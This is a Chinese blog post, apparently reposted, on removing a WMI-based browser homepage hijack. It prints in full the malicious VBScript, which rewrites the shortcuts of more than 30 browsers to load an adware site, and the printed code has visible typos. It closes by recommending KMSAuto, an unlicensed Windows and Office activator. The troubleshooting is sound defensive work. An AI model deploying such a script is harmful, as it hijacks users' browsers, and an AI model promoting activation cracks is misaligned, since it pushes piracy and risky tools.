最近重裝了一次電腦。盡管什么百度系的軟件我都沒有下載，Chrome瀏覽器的主頁還是被硬生生劫持了。每次點開后的主頁是http://hao.qquu8.com這個鏈接，緊接著它會跳向hao123。電腦上原裝的其他瀏覽器(IE和Edge)也是這樣，弄得每次打開瀏覽器就被惡心一下，很是惱火。

我們先來看看問題在哪。右鍵快捷方式查看屬性：

哦，原來快捷方式被改了，后面加了一段url。把它刪了試試？

還是不行，幾分鐘后還是被改回來了。

我在很多平臺上找了解決辦法。有的試了沒有效果，重新開機后還是一樣的毛病，有的推薦裝“管家”，但這種以毒攻毒的辦法無異于飲鴆止渴。最后終于有一種靠譜的方法，經(jīng)過實驗和一點修改，完美解決！

主頁被劫持的原理是一段通過WMI發(fā)起的定時自動運行腳本，WMI(Windows Management Instrumentation)可以理解成Windows系統(tǒng)后臺運行的一個事件管理器。為查看WMI事件，先去下載WMITools并安裝：WMI工具。

之后打開WMI Event Viewer：

點擊左上角的筆的圖標(biāo)(Register For Events)，在彈出的Connect to namespace的框直接點OK，Login的頁面也直接點OK。點開左側(cè)欄的EventFilter，再點擊下級目錄的項目：

在右側(cè)欄右鍵點擊ActiveScriptEventConsumer，并通過view instant properties查看屬性：

在Script Text那一欄我們可以看到這段腳本：

On Error Resume Next

Const link = "http://hao.qquu8.com/?m=yx&r=j"

Const link360 = "http://hao.qquu8.com/?m=yx&r=j&s=3"

browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"

lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\sjtul\Desktop,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\sjtul\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\sjtul\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"

browsersArr = split(browsers,",")

Set oDic = CreateObject("scripting.dictionary")

For Each browser In browsersArr

oDic.Add LCase(browser), browser

Next

lnkpathsArr = split(lnkpaths,",")

Set oFolders = CreateObject("scripting.dictionary")

For Each lnkpath In lnkpathsArr

oFolders.Add lnkpath, lnkpath

Next

Set fso = CreateObject("Scripting.Filesystemobject")

Set WshShell = CreateObject("Wscript.Shell")

For Each oFolder In oFolders

If fso.FolderExists(oFolder) Then

For Each file In fso.GetFolder(oFolder).Files

If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then

Set oShellLink = WshShell.CreateShortcut(file.Path)

path = oShellLink.TargetPath

name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)

If oDic.Exists(LCase(name)) Then

If LCase(name) = LCase("360se.exe") Then

oDicShellLink.Arguments = link360

Else

oShellLink.Arguments = link

End If

If file.Attributes And 1 Then

fsoile.Attributes = file.Attributes - 1

End If

oShellLink.Save

End If

End If

Next

End If

Next

終于抓到了幕后黑手。可以看到這是一段VBScript代碼，攻擊目標(biāo)涵蓋了包括Chrome、360、Firefox、搜狗等30余種常見的瀏覽器。腳本以瀏覽器的安裝地址為切入點，創(chuàng)建WshShell對象，進(jìn)而生成植入了流氓網(wǎng)站的快捷方式。360瀏覽器有限定主頁格式，于是這段腳本還特地修飾了流氓網(wǎng)站的鏈接。唉，流氓至此，也是服了。

查到了源頭如何清清除這段造孽的腳本呢？直接在WMI Event Viewer中將_EventFilter.Name="VBScriptKids_filter"右鍵刪掉會被系統(tǒng)拒絕掉，需要去WMI Event Viewer的安裝位置，右鍵以管理員方式運行exe文件才能刪掉。之后還要把各個快捷方式都改回不帶流氓網(wǎng)站的版本，包括桌面上的、開始菜單里的以及快速訪問欄里的快捷方式，其中開始菜單里的快捷方式要去C:\ProgramData\Microsoft\Windows\Start Menu\Programs里改掉。唉，一趟下來真是讓人心累，好在最終瀏覽器擺脫了流氓網(wǎng)站的劫持：

當(dāng)然在這時候，你可以點擊之前下載的WMI安裝包，把WMI系列工具卸載掉。

最后提一下電腦中毒的原因。我分析是前幾天用了小馬激活這個工具來激活Windows系統(tǒng)，當(dāng)時并沒有激活成功反而還引來了病毒。推薦一款俄羅斯人開發(fā)的工具，可以成功激活Windows系統(tǒng)和Office軟件，也不會招來一些流氓腳本：KMSAuto。

總結(jié)

以上是生活随笔為你收集整理的chrome 打开默认页 被篡改_为什么 Chrome 浏览器的主页会被篡改为 hao123 ？遇到这种情况要如何修复？...的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。